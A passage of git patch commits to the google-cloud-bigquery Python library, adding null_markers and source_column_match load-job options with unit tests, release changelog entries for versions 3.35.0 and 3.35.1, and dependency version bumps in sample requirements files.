config["nullMarkers"] = self.NULL_MARKERS config["destinationTable"] = { "projectId": self.PROJECT, @@ -140,6 +142,10 @@ def _verifyResourceProperties(self, job, resource): self.assertEqual(job.null_marker, config["nullMarker"]) else: self.assertIsNone(job.null_marker) + if "nullMarkers" in config: + self.assertEqual(job.null_markers, config["nullMarkers"]) + else: + self.assertIsNone(job.null_markers) if "quote" in config: self.assertEqual(job.quote_character, config["quote"]) else: @@ -211,6 +217,7 @@ def test_ctor(self): self.assertIsNone(job.ignore_unknown_values) self.assertIsNone(job.max_bad_records) self.assertIsNone(job.null_marker) + self.assertIsNone(job.null_markers) self.assertIsNone(job.quote_character) self.assertIsNone(job.skip_leading_rows) self.assertIsNone(job.source_format) diff --git a/tests/unit/job/test_load_config.py b/tests/unit/job/test_load_config.py index dbb062486..8ff9244d2 100644 --- a/tests/unit/job/test_load_config.py +++ b/tests/unit/job/test_load_config.py @@ -469,6 +469,22 @@ def test_null_marker_setter(self): config.null_marker = null_marker self.assertEqual(config._properties["load"]["nullMarker"], null_marker) + def test_null_markers_missing(self): + config = self._get_target_class()() + self.assertIsNone(config.null_markers) + + def test_null_markers_hit(self): + null_markers = ["", "NA"] + config = self._get_target_class()() + config._properties["load"]["nullMarkers"] = null_markers + self.assertEqual(config.null_markers, null_markers) + + def test_null_markers_setter(self): + null_markers = ["", "NA"] + config = self._get_target_class()() + config.null_markers = null_markers + self.assertEqual(config._properties["load"]["nullMarkers"], null_markers) + def test_preserve_ascii_control_characters_missing(self): config = self._get_target_class()() self.assertIsNone(config.preserve_ascii_control_characters) diff --git a/tests/unit/test_external_config.py b/tests/unit/test_external_config.py index 3a441d1f5..61532b4b8 100644 --- a/tests/unit/test_external_config.py +++ b/tests/unit/test_external_config.py @@ -277,6 +277,7 @@ def test_from_api_repr_csv(self): "allowJaggedRows": False, "encoding": "encoding", "preserveAsciiControlCharacters": False, + "nullMarkers": ["", "NA"], }, }, ) @@ -293,6 +294,7 @@ def test_from_api_repr_csv(self): self.assertEqual(ec.options.allow_jagged_rows, False) self.assertEqual(ec.options.encoding, "encoding") self.assertEqual(ec.options.preserve_ascii_control_characters, False) + self.assertEqual(ec.options.null_markers, ["", "NA"]) got_resource = ec.to_api_repr() @@ -314,6 +316,7 @@ def test_to_api_repr_csv(self): options.skip_leading_rows = 123 options.allow_jagged_rows = False options.preserve_ascii_control_characters = False + options.null_markers = ["", "NA"] ec.csv_options = options exp_resource = { @@ -326,6 +329,7 @@ def test_to_api_repr_csv(self): "allowJaggedRows": False, "encoding": "encoding", "preserveAsciiControlCharacters": False, + "nullMarkers": ["", "NA"], }, } From 6d5d23685cd457d85955356705c1101e9ec3cdcd Mon Sep 17 00:00:00 2001 From: Chalmer Lowe Date: Tue, 15 Jul 2025 18:04:24 -0400 Subject: [PATCH 149/202] feat: Adds source_column_match and associated tests (#2227) This commit introduces new configuration options for BigQuery load jobs and external table definitions, aligning with recent updates to the underlying protos. New options added: - `source_column_name_match_option`: Controls how source columns are matched to the schema. (Applies to LoadJobConfig, ExternalConfig, LoadJob) Changes include: - Added corresponding properties (getters/setters) to `LoadJobConfig`, `LoadJob`, `ExternalConfig`, and `CSVOptions`. - Updated docstrings and type hints for all new attributes. - Updated unit tests to cover the new options, ensuring they are correctly handled during object initialization, serialization to API representation, and deserialization from API responses. --- google/cloud/bigquery/enums.py | 18 ++++++++++ google/cloud/bigquery/external_config.py | 34 +++++++++++++++++++ google/cloud/bigquery/job/load.py | 43 +++++++++++++++++++++++- tests/unit/job/test_load.py | 15 +++++++++ tests/unit/job/test_load_config.py | 32 ++++++++++++++++++ tests/unit/test_external_config.py | 43 +++++++++++++++++++++++- 6 files changed, 183 insertions(+), 2 deletions(-) diff --git a/google/cloud/bigquery/enums.py b/google/cloud/bigquery/enums.py index 9a1e4880c..1b1eb241a 100644 --- a/google/cloud/bigquery/enums.py +++ b/google/cloud/bigquery/enums.py @@ -462,3 +462,21 @@ class JobCreationMode(object): The conditions under which BigQuery can decide to not create a Job are subject to change. """ + + +class SourceColumnMatch(str, enum.Enum): + """Uses sensible defaults based on how the schema is provided. + If autodetect is used, then columns are matched by name. Otherwise, columns + are matched by position. This is done to keep the behavior backward-compatible. + """ + + SOURCE_COLUMN_MATCH_UNSPECIFIED = "SOURCE_COLUMN_MATCH_UNSPECIFIED" + """Unspecified column name match option.""" + + POSITION = "POSITION" + """Matches by position. This assumes that the columns are ordered the same + way as the schema.""" + + NAME = "NAME" + """Matches by name. This reads the header row as column names and reorders + columns to match the field names in the schema.""" diff --git a/google/cloud/bigquery/external_config.py b/google/cloud/bigquery/external_config.py index 69ed72bc9..dc7a33e6a 100644 --- a/google/cloud/bigquery/external_config.py +++ b/google/cloud/bigquery/external_config.py @@ -30,6 +30,7 @@ from google.cloud.bigquery._helpers import _int_or_none from google.cloud.bigquery._helpers import _str_or_none from google.cloud.bigquery import _helpers +from google.cloud.bigquery.enums import SourceColumnMatch from google.cloud.bigquery.format_options import AvroOptions, ParquetOptions from google.cloud.bigquery import schema from google.cloud.bigquery.schema import SchemaField @@ -474,6 +475,39 @@ def skip_leading_rows(self): def skip_leading_rows(self, value): self._properties["skipLeadingRows"] = str(value) + @property + def source_column_match(self) -> Optional[SourceColumnMatch]: + """Optional[google.cloud.bigquery.enums.SourceColumnMatch]: Controls the + strategy used to match loaded columns to the schema. If not set, a sensible + default is chosen based on how the schema is provided. If autodetect is + used, then columns are matched by name. Otherwise, columns are matched by + position. This is done to keep the behavior backward-compatible. + + Acceptable values are: + + SOURCE_COLUMN_MATCH_UNSPECIFIED: Unspecified column name match option. + POSITION: matches by position. This assumes that the columns are ordered + the same way as the schema. + NAME: matches by name. This reads the header row as column names and + reorders columns to match the field names in the schema. + + See + https://cloud.google.com/bigquery/docs/reference/rest/v2/tables#CsvOptions.FIELDS.source_column_match + """ + + value = self._properties.get("sourceColumnMatch") + return SourceColumnMatch(value) if value is not None else None + + @source_column_match.setter + def source_column_match(self, value: Union[SourceColumnMatch, str, None]): + if value is not None and not isinstance(value, (SourceColumnMatch, str)): + raise TypeError( + "value must be a google.cloud.bigquery.enums.SourceColumnMatch, str, or None" + ) + if isinstance(value, SourceColumnMatch): + value = value.value + self._properties["sourceColumnMatch"] = value if value else None + @property def null_markers(self) -> Optional[Iterable[str]]: """Optional[Iterable[str]]: A list of strings represented as SQL NULL values in a CSV file. diff --git a/google/cloud/bigquery/job/load.py b/google/cloud/bigquery/job/load.py index eabc12cfc..8cdb779ac 100644 --- a/google/cloud/bigquery/job/load.py +++ b/google/cloud/bigquery/job/load.py @@ -15,9 +15,10 @@ """Classes for load jobs.""" import typing -from typing import FrozenSet, List, Iterable, Optional +from typing import FrozenSet, List, Iterable, Optional, Union from google.cloud.bigquery.encryption_configuration import EncryptionConfiguration +from google.cloud.bigquery.enums import SourceColumnMatch from google.cloud.bigquery.external_config import HivePartitioningOptions from google.cloud.bigquery.format_options import ParquetOptions from google.cloud.bigquery import _helpers @@ -569,6 +570,39 @@ def source_format(self): def source_format(self, value): self._set_sub_prop("sourceFormat", value) + @property + def source_column_match(self) -> Optional[SourceColumnMatch]: + """Optional[google.cloud.bigquery.enums.SourceColumnMatch]: Controls the + strategy used to match loaded columns to the schema. If not set, a sensible + default is chosen based on how the schema is provided. If autodetect is + used, then columns are matched by name. Otherwise, columns are matched by + position. This is done to keep the behavior backward-compatible. + + Acceptable values are: + + SOURCE_COLUMN_MATCH_UNSPECIFIED: Unspecified column name match option. + POSITION: matches by position. This assumes that the columns are ordered + the same way as the schema. + NAME: matches by name. This reads the header row as column names and + reorders columns to match the field names in the schema. + + See: + + https://cloud.google.com/bigquery/docs/reference/rest/v2/Job#JobConfigurationLoad.FIELDS.source_column_match + """ + value = self._get_sub_prop("sourceColumnMatch") + return SourceColumnMatch(value) if value is not None else None + + @source_column_match.setter + def source_column_match(self, value: Union[SourceColumnMatch, str, None]): + if value is not None and not isinstance(value, (SourceColumnMatch, str)): + raise TypeError( + "value must be a google.cloud.bigquery.enums.SourceColumnMatch, str, or None" + ) + if isinstance(value, SourceColumnMatch): + value = value.value + self._set_sub_prop("sourceColumnMatch", value if value else None) + @property def date_format(self) -> Optional[str]: """Optional[str]: Date format used for parsing DATE values. @@ -983,6 +1017,13 @@ def clustering_fields(self): """ return self.configuration.clustering_fields + @property + def source_column_match(self) -> Optional[SourceColumnMatch]: + """See + :attr:`google.cloud.bigquery.job.LoadJobConfig.source_column_match`. + """ + return self.configuration.source_column_match + @property def date_format(self): """See diff --git a/tests/unit/job/test_load.py b/tests/unit/job/test_load.py index 5d52401c9..b551d52dd 100644 --- a/tests/unit/job/test_load.py +++ b/tests/unit/job/test_load.py @@ -19,6 +19,7 @@ from .helpers import _Base from .helpers import _make_client +from google.cloud.bigquery.enums import SourceColumnMatch class TestLoadJob(_Base): @@ -37,6 +38,7 @@ def _setUpConstants(self): self.OUTPUT_BYTES = 23456 self.OUTPUT_ROWS = 345 self.REFERENCE_FILE_SCHEMA_URI = "gs://path/to/reference" + self.SOURCE_COLUMN_MATCH = "NAME" self.DATE_FORMAT = "%Y-%m-%d" self.DATETIME_FORMAT = "%Y-%m-%dT%H:%M:%S" self.TIME_ZONE = "UTC" @@ -48,6 +50,7 @@ def _make_resource(self, started=False, ended=False): resource = super(TestLoadJob, self)._make_resource(started, ended) config = resource["configuration"]["load"] config["sourceUris"] = [self.SOURCE1] + config["sourceColumnMatch"] = self.SOURCE_COLUMN_MATCH config["dateFormat"] = self.DATE_FORMAT config["datetimeFormat"] = self.DATETIME_FORMAT config["timeZone"] = self.TIME_ZONE @@ -189,6 +192,15 @@ def _verifyResourceProperties(self, job, resource): else: self.assertIsNone(job.timestamp_format) + if "sourceColumnMatch" in config: + # job.source_column_match will be an Enum, config[...] is a string + self.assertEqual( + job.source_column_match.value, + config["sourceColumnMatch"], + ) + else: + self.assertIsNone(job.source_column_match) + def test_ctor(self): client = _make_client(project=self.PROJECT) job = self._make_one(self.JOB_ID, [self.SOURCE1], self.TABLE_REF, client) @@ -231,6 +243,7 @@ def test_ctor(self): self.assertIsNone(job.clustering_fields) self.assertIsNone(job.schema_update_options) self.assertIsNone(job.reference_file_schema_uri) + self.assertIsNone(job.source_column_match) self.assertIsNone(job.date_format) self.assertIsNone(job.datetime_format) self.assertIsNone(job.time_zone) @@ -631,6 +644,7 @@ def test_begin_w_alternate_client(self): ] }, "schemaUpdateOptions": [SchemaUpdateOption.ALLOW_FIELD_ADDITION], + "sourceColumnMatch": self.SOURCE_COLUMN_MATCH, "dateFormat": self.DATE_FORMAT, "datetimeFormat": self.DATETIME_FORMAT, "timeZone": self.TIME_ZONE, @@ -665,6 +679,7 @@ def test_begin_w_alternate_client(self): config.write_disposition = WriteDisposition.WRITE_TRUNCATE config.schema_update_options = [SchemaUpdateOption.ALLOW_FIELD_ADDITION] config.reference_file_schema_uri = "gs://path/to/reference" + config.source_column_match = SourceColumnMatch(self.SOURCE_COLUMN_MATCH) config.date_format = self.DATE_FORMAT config.datetime_format = self.DATETIME_FORMAT config.time_zone = self.TIME_ZONE diff --git a/tests/unit/job/test_load_config.py b/tests/unit/job/test_load_config.py index 8ff9244d2..27d3cead1 100644 --- a/tests/unit/job/test_load_config.py +++ b/tests/unit/job/test_load_config.py @@ -844,6 +844,38 @@ def test_write_disposition_setter(self): config._properties["load"]["writeDisposition"], write_disposition ) + def test_source_column_match_missing(self): + config = self._get_target_class()() + self.assertIsNone(config.source_column_match) + + def test_source_column_match_hit(self): + from google.cloud.bigquery.enums import SourceColumnMatch + + option_enum = SourceColumnMatch.NAME + config = self._get_target_class()() + # Assume API stores the string value of the enum + config._properties["load"]["sourceColumnMatch"] = option_enum.value + self.assertEqual(config.source_column_match, option_enum) + + def test_source_column_match_setter(self): + from google.cloud.bigquery.enums import SourceColumnMatch + + option_enum = SourceColumnMatch.POSITION + config = self._get_target_class()() + config.source_column_match = option_enum + # Assert that the string value of the enum is stored + self.assertEqual( + config._properties["load"]["sourceColumnMatch"], option_enum.value + ) + option_str = "NAME" + config.source_column_match = option_str + self.assertEqual(config._properties["load"]["sourceColumnMatch"], option_str) + + def test_source_column_match_setter_invalid_type(self): + config = self._get_target_class()() + with self.assertRaises(TypeError): + config.source_column_match = 3.14 + def test_date_format_missing(self): config = self._get_target_class()() self.assertIsNone(config.date_format) diff --git a/tests/unit/test_external_config.py b/tests/unit/test_external_config.py index 61532b4b8..ea827a560 100644 --- a/tests/unit/test_external_config.py +++ b/tests/unit/test_external_config.py @@ -19,12 +19,14 @@ from google.cloud.bigquery import external_config from google.cloud.bigquery import schema +from google.cloud.bigquery.enums import SourceColumnMatch import pytest class TestExternalConfig(unittest.TestCase): SOURCE_URIS = ["gs://foo", "gs://bar"] + SOURCE_COLUMN_MATCH = SourceColumnMatch.NAME DATE_FORMAT = "MM/DD/YYYY" DATETIME_FORMAT = "MM/DD/YYYY HH24:MI:SS" TIME_ZONE = "America/Los_Angeles" @@ -277,6 +279,7 @@ def test_from_api_repr_csv(self): "allowJaggedRows": False, "encoding": "encoding", "preserveAsciiControlCharacters": False, + "sourceColumnMatch": self.SOURCE_COLUMN_MATCH, "nullMarkers": ["", "NA"], }, }, @@ -294,6 +297,10 @@ def test_from_api_repr_csv(self): self.assertEqual(ec.options.allow_jagged_rows, False) self.assertEqual(ec.options.encoding, "encoding") self.assertEqual(ec.options.preserve_ascii_control_characters, False) + self.assertEqual( + ec.options.source_column_match, + self.SOURCE_COLUMN_MATCH, + ) self.assertEqual(ec.options.null_markers, ["", "NA"]) got_resource = ec.to_api_repr() @@ -316,7 +323,9 @@ def test_to_api_repr_csv(self): options.skip_leading_rows = 123 options.allow_jagged_rows = False options.preserve_ascii_control_characters = False + options.source_column_match = self.SOURCE_COLUMN_MATCH options.null_markers = ["", "NA"] + ec.csv_options = options exp_resource = { @@ -329,6 +338,7 @@ def test_to_api_repr_csv(self): "allowJaggedRows": False, "encoding": "encoding", "preserveAsciiControlCharacters": False, + "sourceColumnMatch": self.SOURCE_COLUMN_MATCH, "nullMarkers": ["", "NA"], }, } @@ -881,7 +891,9 @@ def test_to_api_repr(self): ) -class CSVOptions(unittest.TestCase): +class TestCSVOptions(unittest.TestCase): + SOURCE_COLUMN_MATCH = SourceColumnMatch.NAME + def test_to_api_repr(self): options = external_config.CSVOptions() options.field_delimiter = "\t" @@ -891,6 +903,7 @@ def test_to_api_repr(self): options.allow_jagged_rows = False options.encoding = "UTF-8" options.preserve_ascii_control_characters = False + options.source_column_match = self.SOURCE_COLUMN_MATCH resource = options.to_api_repr() @@ -904,9 +917,37 @@ def test_to_api_repr(self): "allowJaggedRows": False, "encoding": "UTF-8", "preserveAsciiControlCharacters": False, + "sourceColumnMatch": self.SOURCE_COLUMN_MATCH, }, ) + def test_source_column_match_None(self): + ec = external_config.CSVOptions() + ec.source_column_match = None + expected = None + result = ec.source_column_match + self.assertEqual(expected, result) + + def test_source_column_match_valid_input(self): + ec = external_config.CSVOptions() + ec.source_column_match = SourceColumnMatch.NAME + expected = "NAME" + result = ec.source_column_match + self.assertEqual(expected, result) + + ec.source_column_match = "POSITION" + expected = "POSITION" + result = ec.source_column_match + self.assertEqual(expected, result) + + def test_source_column_match_invalid_input(self): + ec = external_config.CSVOptions() + with self.assertRaisesRegex( + TypeError, + "value must be a google.cloud.bigquery.enums.SourceColumnMatch, str, or None", + ): + ec.source_column_match = 3.14 + class TestGoogleSheetsOptions(unittest.TestCase): def test_to_api_repr(self): From ef49f739998120ef348ffafdb97c22bddb323e83 Mon Sep 17 00:00:00 2001 From: "release-please[bot]" <55107282+release-please[bot]@users.noreply.github.com> Date: Tue, 15 Jul 2025 20:29:42 -0400 Subject: [PATCH 150/202] chore(main): release 3.35.0 (#2207) Co-authored-by: release-please[bot] <55107282+release-please[bot]@users.noreply.github.com> --- CHANGELOG.md | 28 ++++++++++++++++++++++++++++ google/cloud/bigquery/version.py | 2 +- 2 files changed, 29 insertions(+), 1 deletion(-) diff --git a/CHANGELOG.md b/CHANGELOG.md index 3b29a6a41..e4574aa7a 100644 --- a/CHANGELOG.md +++ b/CHANGELOG.md @@ -5,6 +5,34 @@ [1]: https://pypi.org/project/google-cloud-bigquery/#history +## [3.35.0](https://github.com/googleapis/python-bigquery/compare/v3.34.0...v3.35.0) (2025-07-15) + + +### Features + +* Add null_markers property to LoadJobConfig and CSVOptions ([#2239](https://github.com/googleapis/python-bigquery/issues/2239)) ([289446d](https://github.com/googleapis/python-bigquery/commit/289446dd8c356d11a0b63b8e6275629b1ae5dc08)) +* Add total slot ms to RowIterator ([#2233](https://github.com/googleapis/python-bigquery/issues/2233)) ([d44bf02](https://github.com/googleapis/python-bigquery/commit/d44bf0231e6e96369e4e03667a3f96618fb664e2)) +* Add UpdateMode to update_dataset ([#2204](https://github.com/googleapis/python-bigquery/issues/2204)) ([eb9c2af](https://github.com/googleapis/python-bigquery/commit/eb9c2aff242c5107f968bbd8b6a9d30cecc877f6)) +* Adds dataset_view parameter to get_dataset method ([#2198](https://github.com/googleapis/python-bigquery/issues/2198)) ([28a5750](https://github.com/googleapis/python-bigquery/commit/28a5750d455f0381548df6f9b1f7661823837d81)) +* Adds date_format to load job and external config ([#2231](https://github.com/googleapis/python-bigquery/issues/2231)) ([7d31828](https://github.com/googleapis/python-bigquery/commit/7d3182802deccfceb0646b87fc8d12275d0a569b)) +* Adds datetime_format as an option ([#2236](https://github.com/googleapis/python-bigquery/issues/2236)) ([54d3dc6](https://github.com/googleapis/python-bigquery/commit/54d3dc66244d50a031e3c80d43d372d2743ecbc3)) +* Adds source_column_match and associated tests ([#2227](https://github.com/googleapis/python-bigquery/issues/2227)) ([6d5d236](https://github.com/googleapis/python-bigquery/commit/6d5d23685cd457d85955356705c1101e9ec3cdcd)) +* Adds time_format and timestamp_format and associated tests ([#2238](https://github.com/googleapis/python-bigquery/issues/2238)) ([371ad29](https://github.com/googleapis/python-bigquery/commit/371ad292df537278767dba71d81822ed57dd8e7d)) +* Adds time_zone to external config and load job ([#2229](https://github.com/googleapis/python-bigquery/issues/2229)) ([b2300d0](https://github.com/googleapis/python-bigquery/commit/b2300d032843512b7e4a5703377632fe60ef3f8d)) + + +### Bug Fixes + +* Adds magics.context.project to eliminate issues with unit tests … ([#2228](https://github.com/googleapis/python-bigquery/issues/2228)) ([27ff3a8](https://github.com/googleapis/python-bigquery/commit/27ff3a89a5f97305fa3ff673aa9183baa7df200f)) +* Fix rows returned when both start_index and page_size are provided ([#2181](https://github.com/googleapis/python-bigquery/issues/2181)) ([45643a2](https://github.com/googleapis/python-bigquery/commit/45643a2e20ce5d503118522dd195aeca00dec3bc)) +* Make AccessEntry equality consistent with from_api_repr ([#2218](https://github.com/googleapis/python-bigquery/issues/2218)) ([4941de4](https://github.com/googleapis/python-bigquery/commit/4941de441cb32cabeb55ec0320f305fb62551155)) +* Update type hints for various BigQuery files ([#2206](https://github.com/googleapis/python-bigquery/issues/2206)) ([b863291](https://github.com/googleapis/python-bigquery/commit/b86329188ba35e61871db82ae1d95d2a576eed1b)) + + +### Documentation + +* Improve clarity of "Output Only" fields in Dataset class ([#2201](https://github.com/googleapis/python-bigquery/issues/2201)) ([bd5aba8](https://github.com/googleapis/python-bigquery/commit/bd5aba8ba40c2f35fb672a68eed11d6baedb304f)) + ## [3.34.0](https://github.com/googleapis/python-bigquery/compare/v3.33.0...v3.34.0) (2025-05-27) diff --git a/google/cloud/bigquery/version.py b/google/cloud/bigquery/version.py index 9e1393854..0107ae309 100644 --- a/google/cloud/bigquery/version.py +++ b/google/cloud/bigquery/version.py @@ -12,4 +12,4 @@ # See the License for the specific language governing permissions and # limitations under the License. -__version__ = "3.34.0" +__version__ = "3.35.0" From 4400f26dcb03826f835de8348aef25a0fcbf5115 Mon Sep 17 00:00:00 2001 From: Mend Renovate Date: Wed, 16 Jul 2025 19:22:36 +0200 Subject: [PATCH 151/202] chore(deps): update all dependencies to v3.35.0 (#2242) --- samples/desktopapp/requirements.txt | 2 +- samples/geography/requirements.txt | 2 +- samples/magics/requirements.txt | 2 +- samples/notebooks/requirements.txt | 2 +- samples/snippets/requirements.txt | 2 +- 5 files changed, 5 insertions(+), 5 deletions(-) diff --git a/samples/desktopapp/requirements.txt b/samples/desktopapp/requirements.txt index a512dbd3a..54b708ca8 100644 --- a/samples/desktopapp/requirements.txt +++ b/samples/desktopapp/requirements.txt @@ -1,2 +1,2 @@ -google-cloud-bigquery==3.34.0 +google-cloud-bigquery==3.35.0 google-auth-oauthlib==1.2.2 diff --git a/samples/geography/requirements.txt b/samples/geography/requirements.txt index e932625b8..5b85a9bfe 100644 --- a/samples/geography/requirements.txt +++ b/samples/geography/requirements.txt @@ -13,7 +13,7 @@ geopandas===1.0.1; python_version <= '3.9' geopandas==1.1.1; python_version >= '3.10' google-api-core==2.25.1 google-auth==2.40.3 -google-cloud-bigquery==3.34.0 +google-cloud-bigquery==3.35.0 google-cloud-bigquery-storage==2.32.0 google-cloud-core==2.4.3 google-crc32c==1.7.1 diff --git a/samples/magics/requirements.txt b/samples/magics/requirements.txt index b53a35982..5c48d707f 100644 --- a/samples/magics/requirements.txt +++ b/samples/magics/requirements.txt @@ -1,6 +1,6 @@ bigquery_magics==0.10.1 db-dtypes==1.4.3 -google.cloud.bigquery==3.34.0 +google.cloud.bigquery==3.35.0 google-cloud-bigquery-storage==2.32.0 ipython===8.18.1 pandas==2.3.1 diff --git a/samples/notebooks/requirements.txt b/samples/notebooks/requirements.txt index 4b134ac9d..88f725bb4 100644 --- a/samples/notebooks/requirements.txt +++ b/samples/notebooks/requirements.txt @@ -1,6 +1,6 @@ bigquery-magics==0.10.1 db-dtypes==1.4.3 -google-cloud-bigquery==3.34.0 +google-cloud-bigquery==3.35.0 google-cloud-bigquery-storage==2.32.0 ipython===8.18.1; python_version == '3.9' ipython==9.4.0; python_version >= '3.10' diff --git a/samples/snippets/requirements.txt b/samples/snippets/requirements.txt index fd8bd672b..e43cb04e9 100644 --- a/samples/snippets/requirements.txt +++ b/samples/snippets/requirements.txt @@ -1,2 +1,2 @@ # samples/snippets should be runnable with no "extras" -google-cloud-bigquery==3.34.0 +google-cloud-bigquery==3.35.0 From d207f6539b7a4c248a5de5719d7f384abbe20abe Mon Sep 17 00:00:00 2001 From: shollyman Date: Mon, 21 Jul 2025 17:34:50 -0500 Subject: [PATCH 152/202] docs: specify the inherited-members directive for job classes (#2244) It seems that versions of python earlier than 3.10 may have had issues processing inherited members annotations, and accidentally include inherited members by default. As we recently worked to excise older versions of python in this repo, it seems we're now correctly processing sphinx directives, which means we no longer emit docstrings for inherited members. This PR adds a minor sphinx directive to include inherited members for the job classes, and I've confirmed locally by running the `docsfx` nox job that the inherited members do now get included in the docfx_yaml output. --- docs/reference.rst | 1 + 1 file changed, 1 insertion(+) diff --git a/docs/reference.rst b/docs/reference.rst index 6c00df077..d24a73596 100644 --- a/docs/reference.rst +++ b/docs/reference.rst @@ -22,6 +22,7 @@ Job === .. automodule:: google.cloud.bigquery.job + :inherited-members: .. toctree:: :maxdepth: 2 From 29b854823011d131b322e9fd8356cd307d188aac Mon Sep 17 00:00:00 2001 From: "release-please[bot]" <55107282+release-please[bot]@users.noreply.github.com> Date: Thu, 24 Jul 2025 10:57:43 -0400 Subject: [PATCH 153/202] chore(main): release 3.35.1 (#2245) Co-authored-by: release-please[bot] <55107282+release-please[bot]@users.noreply.github.com> --- CHANGELOG.md | 7 +++++++ google/cloud/bigquery/version.py | 2 +- 2 files changed, 8 insertions(+), 1 deletion(-) diff --git a/CHANGELOG.md b/CHANGELOG.md index e4574aa7a..374448a5e 100644 --- a/CHANGELOG.md +++ b/CHANGELOG.md @@ -5,6 +5,13 @@ [1]: https://pypi.org/project/google-cloud-bigquery/#history +## [3.35.1](https://github.com/googleapis/python-bigquery/compare/v3.35.0...v3.35.1) (2025-07-21) + + +### Documentation + +* Specify the inherited-members directive for job classes ([#2244](https://github.com/googleapis/python-bigquery/issues/2244)) ([d207f65](https://github.com/googleapis/python-bigquery/commit/d207f6539b7a4c248a5de5719d7f384abbe20abe)) + ## [3.35.0](https://github.com/googleapis/python-bigquery/compare/v3.34.0...v3.35.0) (2025-07-15) diff --git a/google/cloud/bigquery/version.py b/google/cloud/bigquery/version.py index 0107ae309..d565bc46e 100644 --- a/google/cloud/bigquery/version.py +++ b/google/cloud/bigquery/version.py @@ -12,4 +12,4 @@ # See the License for the specific language governing permissions and # limitations under the License. -__version__ = "3.35.0" +__version__ = "3.35.1" From d219989f977d9d449e4f06a65ba151f0ab2bd9a1 Mon Sep 17 00:00:00 2001 From: Mend Renovate Date: Sat, 26 Jul 2025 00:09:47 +0200 Subject: [PATCH 154/202] chore(deps): update all dependencies (#2243) --- samples/desktopapp/requirements.txt | 2 +- samples/geography/requirements.txt | 6 +++--- samples/magics/requirements.txt | 2 +- samples/notebooks/requirements.txt | 2 +- samples/snippets/requirements.txt | 2 +- 5 files changed, 7 insertions(+), 7 deletions(-) diff --git a/samples/desktopapp/requirements.txt b/samples/desktopapp/requirements.txt index 54b708ca8..e7a02eca5 100644 --- a/samples/desktopapp/requirements.txt +++ b/samples/desktopapp/requirements.txt @@ -1,2 +1,2 @@ -google-cloud-bigquery==3.35.0 +google-cloud-bigquery==3.35.1 google-auth-oauthlib==1.2.2 diff --git a/samples/geography/requirements.txt b/samples/geography/requirements.txt index 5b85a9bfe..4f2c0aff4 100644 --- a/samples/geography/requirements.txt +++ b/samples/geography/requirements.txt @@ -13,20 +13,20 @@ geopandas===1.0.1; python_version <= '3.9' geopandas==1.1.1; python_version >= '3.10' google-api-core==2.25.1 google-auth==2.40.3 -google-cloud-bigquery==3.35.0 +google-cloud-bigquery==3.35.1 google-cloud-bigquery-storage==2.32.0 google-cloud-core==2.4.3 google-crc32c==1.7.1 google-resumable-media==2.7.2 googleapis-common-protos==1.70.0 -grpcio==1.73.1 +grpcio==1.74.0 idna==3.10 munch==4.0.0 mypy-extensions==1.1.0 packaging==25.0 pandas==2.3.1 proto-plus==1.26.1 -pyarrow==20.0.0 +pyarrow==21.0.0 pyasn1==0.6.1 pyasn1-modules==0.4.2 pycparser==2.22 diff --git a/samples/magics/requirements.txt b/samples/magics/requirements.txt index 5c48d707f..e72d2822e 100644 --- a/samples/magics/requirements.txt +++ b/samples/magics/requirements.txt @@ -1,6 +1,6 @@ bigquery_magics==0.10.1 db-dtypes==1.4.3 -google.cloud.bigquery==3.35.0 +google.cloud.bigquery==3.35.1 google-cloud-bigquery-storage==2.32.0 ipython===8.18.1 pandas==2.3.1 diff --git a/samples/notebooks/requirements.txt b/samples/notebooks/requirements.txt index 88f725bb4..c9aed9e58 100644 --- a/samples/notebooks/requirements.txt +++ b/samples/notebooks/requirements.txt @@ -1,6 +1,6 @@ bigquery-magics==0.10.1 db-dtypes==1.4.3 -google-cloud-bigquery==3.35.0 +google-cloud-bigquery==3.35.1 google-cloud-bigquery-storage==2.32.0 ipython===8.18.1; python_version == '3.9' ipython==9.4.0; python_version >= '3.10' diff --git a/samples/snippets/requirements.txt b/samples/snippets/requirements.txt index e43cb04e9..afa62b6b8 100644 --- a/samples/snippets/requirements.txt +++ b/samples/snippets/requirements.txt @@ -1,2 +1,2 @@ # samples/snippets should be runnable with no "extras" -google-cloud-bigquery==3.35.0 +google-cloud-bigquery==3.35.1 From 791c53bef3caa672c9b3c5292b4050cd1c62d6e3 Mon Sep 17 00:00:00 2001 From: Mend Renovate Date: Thu, 31 Jul 2025 23:54:06 +0200 Subject: [PATCH 155/202] chore(deps): update dependency matplotlib to v3.10.5 (#2251) --- samples/notebooks/requirements.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/samples/notebooks/requirements.txt b/samples/notebooks/requirements.txt index c9aed9e58..a2f0cb44a 100644 --- a/samples/notebooks/requirements.txt +++ b/samples/notebooks/requirements.txt @@ -5,5 +5,5 @@ google-cloud-bigquery-storage==2.32.0 ipython===8.18.1; python_version == '3.9' ipython==9.4.0; python_version >= '3.10' matplotlib===3.9.2; python_version == '3.9' -matplotlib==3.10.3; python_version >= '3.10' +matplotlib==3.10.5; python_version >= '3.10' pandas==2.3.1 From 8f031666114a826da2ad965f8ecd4727466cb480 Mon Sep 17 00:00:00 2001 From: Dan Lee <71398022+dandhlee@users.noreply.github.com> Date: Tue, 5 Aug 2025 04:41:40 -0400 Subject: [PATCH 156/202] docs: update README to break infinite redirect loop (#2254) --- README.rst | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.rst b/README.rst index 29e15e067..23ed9257d 100644 --- a/README.rst +++ b/README.rst @@ -18,7 +18,7 @@ processing power of Google's infrastructure. .. |versions| image:: https://img.shields.io/pypi/pyversions/google-cloud-bigquery.svg :target: https://pypi.org/project/google-cloud-bigquery/ .. _BigQuery: https://cloud.google.com/bigquery/what-is-bigquery -.. _Client Library Documentation: https://googleapis.dev/python/bigquery/latest +.. _Client Library Documentation: https://cloud.google.com/python/docs/reference/bigquery/latest/summary_overview .. _Product Documentation: https://cloud.google.com/bigquery/docs/reference/v2/ Quick Start From abc319b1bf8a11b0013b34001ca2b99caf34790c Mon Sep 17 00:00:00 2001 From: Mend Renovate Date: Tue, 5 Aug 2025 14:45:23 +0200 Subject: [PATCH 157/202] chore(deps): update all dependencies (#2253) Co-authored-by: Leah E. Cole <6719667+leahecole@users.noreply.github.com> --- samples/geography/requirements.txt | 2 +- samples/magics/requirements.txt | 2 +- samples/notebooks/requirements.txt | 2 +- 3 files changed, 3 insertions(+), 3 deletions(-) diff --git a/samples/geography/requirements.txt b/samples/geography/requirements.txt index 4f2c0aff4..fa54cc229 100644 --- a/samples/geography/requirements.txt +++ b/samples/geography/requirements.txt @@ -1,5 +1,5 @@ 